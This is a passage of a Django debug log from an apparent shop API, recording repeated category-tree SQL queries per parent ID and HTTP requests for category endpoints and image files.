BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:06:41,222 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:06:41,225 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:06:41,228 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:06:41,231 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:06:41,234 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:06:41,237 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:06:41,240 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:06:41,243 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:06:41,246 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:06:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:08:38,562 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:08:38,571 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:08:38,576 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:08:38,580 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:08:38,585 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:08:38,588 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:08:38,592 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:08:38,595 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:08:38,598 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:08:38,601 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:08:38,604 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:08:38,606 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:08:38,608 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:08:38,611 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:08:38,614 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:08:38,617 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:08:38,619 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:08:38,621 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:08:38,624 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:08:38,628 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:08:38,631 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:08:38,633 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:08:38,636 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:08:38,639 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:08:38,642 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:08:38,646 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:08:38,649 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:08:38,652 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:08:38,654 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:08:38,657 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:08:38,661 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:08:38,663 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:08:38,666 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:08:38,669 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:08:38,671 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:08:38,676 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:08:38,678 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:08:38,681 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:08:38,683 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:08:38,686 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:08:38,689 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:08:38,692 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:08:38,695 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:08:38,697 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:08:38,701 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:08:38,703 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:08:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:39] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 14:08:40] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:08:53,444 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:08:53,456 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:08:53,462 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:08:53,466 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:08:53,472 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) 